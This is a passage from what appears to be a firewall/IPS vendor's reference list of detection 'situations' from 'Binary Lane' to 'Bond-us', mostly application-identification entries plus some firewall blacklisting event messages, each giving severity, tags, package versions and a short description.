Description: Binary Lane offers SSD cloud servers that are instantly provisioned with easy-to-understand pricing.
Back to top

Bind2

About this situation: Bind2 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1128-5242
Description: Bind2 is an online anonymizing proxy service.
Back to top

Binfire

About this situation: Application Binfire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Binfire.com is a web-based real time Collaboration and Project Management software designed for virtual teams.
Back to top

Bing

About this situation: Bing usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1411-5242
Description: Bing is Microsoft's web search engine.
Back to top

Bing Map

About this situation: Endpoint Context Agent based Bing Map detection
Context: EI Correlation
Severity: 1
Tags: News, Endpoint
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-994-5242
Description: Bing Map endpoint application detected.
Back to top

Bing Strict Resolve

About this situation: This defines a resolve rule used when Bing strict mode is enforced.
Context: DNS Host Resolution
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewriting rule used when Bing strict mode is enforced.
Back to top

Bing Strict Rewrite

About this situation: This defines a rewrite rule used when Bing strict mode is enforced.
Context: DNS Host Rewriting
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewriting rule used when Bing strict mode is enforced.
Back to top

Bing-Ads

About this situation: Application Bing-Ads detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bing Ads helps to reach customers with search engine marketing.
Back to top

Bing-Maps

About this situation: Bing Maps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-754-5211
Description: Bing Maps usage has been detected. Bing Maps is a web mapping service provided by Microsoft.
Back to top

Bioware

About this situation: BioWare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: BioWare is a Canadian video game developing company.
Back to top

Birch

About this situation: Application Birch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Birch is technology service provider for businesses, deliver the technology for cloud, network, voice and mobile, like Birch Cloud, BirchIT Services, BirchVoice.
Back to top

BirdDog

About this situation: Application BirdDog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BirdDog Enterprise software is a web-based CRM solution.
Back to top

Birdview

About this situation: Application Birdview detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Birdview is software for online project and task management, team collaboration and managing resources. Recommended for teams and SMBs.
Back to top

Birst

About this situation: Application Birst detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Birst is an enterprise-caliber business intelligence platform that combines business analytics with the agility of cloud computing.
Back to top

Bison-group

About this situation: Application Bison-group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bison occur in the IT industry in various companies which are oriented differently. Bison offers computer science-total solutions for different industries, from software to the whole infrastructure support on site or in one of the company's own data centers.
Back to top

BitBay

About this situation: Application BitBay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BitBay is a fast and secure Bitcoin and Litecoin exchange. Buy and sell Bitcoin and Litecoin online for USD, PLN and EUR.
Back to top

Bitbucket

About this situation: Bitbucket usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This service offers both commercial plans and private accounts for projects that use either the Mercurial or Git revision control systems. Source: Wikipedia
Back to top

Bitcasa

About this situation: Bitcasa usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Bitcasa is a free file storage service.
Back to top

Bitcoin-P2P

About this situation: Bitcoin Main Network P2P usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-759-5211
Description: Bitcoin is an open-source P2P virtual currency protocol.
Back to top

BitDefender

About this situation: Bitdefender usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1148-5242
Description: Bitdefender traffic detected. Bitdefender is a security company based in Romania which produces security solutions such as antivirus and internet security software.
Back to top

BitDefender Endpoint Security

About this situation: Endpoint Context Agent based BitDefender Endpoint Security detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: BitDefender Endpoint Security endpoint application has been detected.
Back to top

BitDefender-Update

About this situation: BitDefender Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-919-5242
Description: Update service for BitDefender Antivirus.
Back to top

Bitenova

About this situation: BiteNova usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

BitGo

About this situation: Application BitGo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BitGo is a Blockchain security company. The company offers a multisignature bitcoin wallet service.
Back to top

Bitium

About this situation: Application Bitium detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bitium is a provider of cloud based identity and access management solutions, including single sign on, password management, and analytics for small, medium and enterprise businesses.
Back to top

Bitly

About this situation: Application Bitly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bitly is a link management platform that helps brands deliver and measure efforts across marketing channels.
Back to top

BitPay

About this situation: Application BitPay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BitPay is a global bitcoin payment service provider. BitPay provides payment processing services for merchants, and is one of the largest bitcoin payment processors.
Back to top

Bitrix24

About this situation: Application Bitrix24 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bitrix24 is social enterprise platform. It is a united work space which handles the many aspects of daily operations and tasks.
Back to top

Bitstamp

About this situation: Application Bitstamp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bitstamp is an bitcoin marketplace. It allows people to safely buy and sell bitcoins.
Back to top

BitTorrent

About this situation: BitTorrent traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: BitTorrent is a file sharing protocol.
Back to top

Biz-Netvigator

About this situation: Application Biz-Netvigator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business NETVIGATOR offers a variety of broadband service packages with different combinations of bandwidth, email accounts and number of IP addresses to suit your company's unique setup and usage needs.
Back to top

Bizible

About this situation: Application Bizible detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bizible makes to close the loop between online marketing and real sales data in Salesforce, allowing you to optimize your campaigns by ROI.
Back to top

Bizmanualz

About this situation: Application Bizmanualz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Create Company Policies and Procedures Manual Templates Fast. SOP Standard Operating Procedures in Word Save time. Download Free Sample Word Templates Now.
Back to top

Bizness-Apps

About this situation: Application Bizness-Apps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BiznessApps allows to create mobile apps and mobile websites.
Back to top

Black-Box

About this situation: Application Black-Box detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Black Box Network Solutions is IT solutions provider dedicated to helping customers build, manage, optimize and secure their IT infrastructure.
Back to top

Black-ICE-CRM

About this situation: Application Black-ICE-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Black ICE CRM is a CRM application. It is web based and offered as a hosted service, but it can also be installed at a client location.
Back to top

Blackbaud

About this situation: Application Blackbaud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blackbaud provides solutions to fundraising for nonprofits. Solve donor management and fundraising challenges with nonprofit software.
Back to top

Blackboard-Connect

About this situation: Application Blackboard-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Blackboard Connect mass notification system gives you the ability to reach your community in minutes-whether it is a time-sensitive situation, event outreach, or attendance notification. It is the most efficient way to keep your campus or community more secure, informed, and involved.
Back to top

BlackDuckSoftware

About this situation: Application BlackDuckSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlackDuckSoftware helps companies secure, streamline, and manage use of open source software. Its open source management and security solutions, enable enterprises to optimize the opportunities and solve the logistical challenges that come with open source use.
Back to top

Blacklister-Allowed-A-Connection-From-Blacklister

About this situation: Allowed a connection from blacklister
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Allowed a connection from blacklister.
Back to top

Blacklister-Blacklist-Invalid-Command

About this situation: Invalid command
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid command.
Back to top

Blacklister-Blacklister-Not-Allowed

About this situation: Blacklister not allowed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Blacklister not allowed.
Back to top

Blacklister-Blacklisting-Connection-Closed

About this situation: Blacklisting connection closed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Blacklisting connection closed.
Back to top

Blacklister-Blacklisting-Entries-Flushed

About this situation: Blacklisting entries flushed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Blacklisting entries flushed.
Back to top

Blacklister-Blacklisting-Entry-Deleted

About this situation: Blacklisting entry deleted
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Blacklisting entry deleted.
Back to top

Blacklister-Blacklisting-Entry-Expired

About this situation: Blacklisting entry expired
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Blacklisting entry expired.
Back to top

Blacklister-Cant-Connect-To-Log-Server

About this situation: Cant connect to log server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Can't connect to log server.
Back to top

Blacklister-Cant-Receive-A-Request

About this situation: Cant receive a request
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Can't receive a request.
Back to top

Blacklister-Cant-Send-A-Reply

About this situation: Cant send a reply
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Can't send a reply.
Back to top

Blacklister-Error-In-Receiving-From-Log-Server

About this situation: Error in receiving from log server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error in receiving from log server.
Back to top

Blacklister-Error-In-Sending-To-Log-Server

About this situation: Error in sending to log server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error in sending to log server.
Back to top

Blacklister-Invalid-Peer-Certificate

About this situation: Invalid peer certificate
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid peer certificate.
Back to top

Blacklister-Invalid-Request

About this situation: Invalid request
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid request.
Back to top

Blacklister-New-Blacklisting-Entry

About this situation: New blacklisting entry
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: New blacklisting entry.
Back to top

Blacklister-Read-From-Persistent-Storage

About this situation: Read from persistent storage
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Read from persistent storage.
Back to top

Blacklister-Reply-Buffer-Is-Full

About this situation: Reply buffer is full
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Reply buffer is full.
Back to top

Blacklister-SSL-Handshake-Failed

About this situation: SSL Handshake failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: SSL Handshake failed.
Back to top

Blacklister-Too-Many-Blacklisters

About this situation: Too many blacklisters
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Too many blacklisters.
Back to top

Blacklisting cancellation confirmation

About this situation: Blacklisting cancellation confirmation
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Blacklisting cancellation confirmation
Back to top

Blacklisting cancellation request

About this situation: Blacklisting cancellation request
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Blacklisting cancellation request
Back to top

Blacklisting cleaning confirmation

About this situation: Blacklisting cleaning confirmation
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: Blacklisting cleaning confirmation
Back to top

Blacklisting cleaning request

About this situation: Blacklisting cleaning request
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: Blacklisting cleaning request. Removes all blacklisting entries.
Back to top

Blacklisting execution confirmation

About this situation: Blacklisting execution confirmation
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Execution confirmation of blacklisting request
Back to top

Blacklisting failure

About this situation: Blacklisting failure
Context: Engine situations
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Blacklisting failed:
Back to top

BlackPlanet

About this situation: Application BlackPlanet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlackPlanet is a service that provides online community.
Back to top

BlazeMeter

About this situation: Application BlazeMeter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlazeMeter is a self- service performance and load testing cloud, JMeter-compatible. run tests of 30k, 50k, 80k or more concurrent users, on-demand
Back to top

Blinksale

About this situation: Application Blinksale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blinksale - system for sending invoices automatically
Back to top

Blinkx

About this situation: Blinkx usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a video sharing service that allows users to watch and upload videos. Blinkx allows searching videos on Google Video, YouTube, MySpace, MetaCafe, and more.
Back to top

Blip.tv

About this situation: Blip.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Blip.tv is a platform for web series.
Back to top

Blizzard-Entertainment

About this situation: Blizzard Entertainment traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-1151-5242
Description: Blizzad Entertainment, Inc. is an American video game developing company.
Back to top

Blizzard-World-of-Warcraft

About this situation: Blizzard World of Warcraft traffic
Context: Application Context
Severity: 1
Tags: Protocols, Games
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1728-5242
Description: World of Warcraft is a multiplayer online role-playing game.
Back to top

Blockchain

About this situation: Application Blockchain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blockchain is a web-based bitcoin platform that makes using bitcoin for consumers and businesses.
Back to top

Blockthrough

About this situation: Blockthrough
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Description: Blockthrough monetizes adblock users.
Back to top

Blog Commenting

About this situation: General function that enables a user to post a comment.
Context: URL Application Context
Severity: 1
Tags: Social Web - Various, Productivity Loss
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: General function that enables a user to post a comment.
Back to top

Blog Posting

About this situation: General function that enables a user to post a blog entry.
Context: URL Application Context
Severity: 1
Tags: Social Web - Various, Productivity Loss
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: General function that enables a user to post a blog entry.
Back to top

Blog.com

About this situation: Blog.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-630-5211
Description: Blog.com usage has been detected.
Back to top

Blogger

About this situation: Blogger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-769-5211
Description: Blogger is a free blog-publishing service.
Back to top

Bloglovin

About this situation: Application Bloglovin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bloglovin helps to read, organize and discover blogs on mobile and desktop.
Back to top

Blogs and Personal Sites

About this situation: Sites that host blogs and personal sites.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host blogs and personal sites.
Back to top

Blokus

About this situation: Blokus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-630-5211
Description: Blockus is a board game invented by Bernard Tavitian. The game can be played online at www.blokus.com. The game is based on web and flash technologies.
Back to top

Bloomberg

About this situation: Bloomberg usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Bloomberg is a site for international breaking news, and business and financial information.
Back to top

Bloomfire

About this situation: Application Bloomfire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bloomfire is a socially-enabled knowledge base application that increases virtual knowledge and information sharing in the workplace.
Back to top

Blossom

About this situation: Application Blossom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blossom - Agile product management suite for software Development.
Back to top

Blower-for-Cisco

About this situation: Application Blower-for-Cisco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blower for Cisco integrates Cisco Unified Communications Manager
Back to top

Blue-Cross-Blue-Shield

About this situation: Application Blue-Cross-Blue-Shield detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blue Cross and Blue Shield Association offers health insurance services and also provides healthcare management services.
Back to top

Blue-Jeans-Network

About this situation: Application Blue-Jeans-Network detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blue Jeans Network provides an interoperable cloud-based video conferencing service that connects participants across a wide range of devices and conferencing platforms.
Back to top

Blue-Link-ERP

About this situation: Application Blue-Link-ERP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blue Link ERP is an integrated Accounting, Inventory Management Business Management ERP software solution complete with Contact Management and eCommerce integration. Blue Link ERP is only available to clients located in United States, Canada and the Caribbean.
Back to top

Blue-Wave

About this situation: Application Blue-Wave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlueWave's Cloud Computing service is a highly flexible, enterprise class multi-tenant system built for high availability. As an Enterprise Service Provider partner with VMware and Certified Gold Partner with Microsoft, BlueWave's cloud clusters offer the highest level of resource utilization, scalability and availability.
Back to top

BlueCamroo

About this situation: Application BlueCamroo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlueCamroo is a complete, integrated, and affordable web-based all-in-one online Business Productivity Suite that helps your business manage Sales, Customers, and Projects more efficiently and profitably.
Back to top

BlueCoatSystems

About this situation: Application BlueCoatSystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlueCoatSystems is a provider of Web security and WAN optimization solutions. It offers solutions that provide the visibility, acceleration and security required to optimize and secure the flow of information.
Back to top

BlueCross-BlueShield-of-Florida

About this situation: Application BlueCross-BlueShield-of-Florida detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Part of the Blue Cross and Blue Shield Association, Florida Blue offers affordable health insurance to Individuals, Businesses, and Medicare Individuals.
Back to top

Bluefolder

About this situation: BlueFolder usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: BlueFolder is dedicated to providing powerful and easy-to-use service management software to small and mid-sized service businesses.
Back to top

Blueforce

About this situation: Application Blueforce detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blue Force provides turnkey solutions for the Commercial Security, Industrial Security market as well as comprehensive Emergency Call and Electronic Access Control to residential aged care facilities, hospitals, hostels and nursing homes as well as to people living in the community.
Back to top

BlueHost

About this situation: Application BlueHost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlueHost is a web hosting company that provides analysis of web-based hosting services in collaborative learning programs.
Back to top

BlueKai

About this situation: BlueKai usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: BlueKai is a cloud-based big data platform that provides companies with information about targeted audiences.
Back to top

blueKiwi

About this situation: Application blueKiwi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: blueKiwi Enterprise Social Software - Out Collaborate, Out Communicate, and Out Innovate the Competition
Back to top

Blueleaf

About this situation: Application Blueleaf detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blueleaf offers services to make managing assets simple by tying the asset management process together, end-to-end, and across custodians.
Back to top

Bluemango-Zendesk

About this situation: Application Bluemango-Zendesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bluemango is a Zendesk based learning system and support service.
Back to top

BlueTie

About this situation: Application BlueTie detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BlueTie provides software-as-a-service based email hosting and collaboration software solutions for small to mid-sized businesses
Back to top

Blurb

About this situation: Application Blurb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blurb is a book-making platform and creative community that enables individuals to create, publish, share and sell high-quality photo books, trade books, and magazines in both print and digital formats.
Back to top

BMC

About this situation: Application BMC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BMC provides software solutions that helps IT transform businesses into digital enterprises.
Back to top

BMC-TrueSight-Pulse

About this situation: Application BMC-TrueSight-Pulse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Real time monitoring-as-a-service for web applications
Back to top

BNP-Paribas

About this situation: BNP Paribas usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1764-5242
Description: BNP Paribas usage detected. BNP Paribas is a French banking corporation.
Back to top

BoardOnTrack

About this situation: Application BoardOnTrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Annual Board Retreats Strategic Planning Executive Coaching for CEO
Back to top

Bodet-software

About this situation: Application Bodet-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bodet Software is the group Bodet department dedicated to IT management time and human resources.
Back to top

Boingo-Wireless

About this situation: Application Boingo-Wireless detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boingo Wireless is an American company that provides global Wi-Fi services.
Back to top

Bomgar

About this situation: Application Bomgar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bomgar is a remote support solution allowing support technicians to connect with end user systems via firewalls from PCs or mobile devices.
Back to top

Bond-us

About this situation: Application Bond-us detected
Context: Application Context
Severity: 1
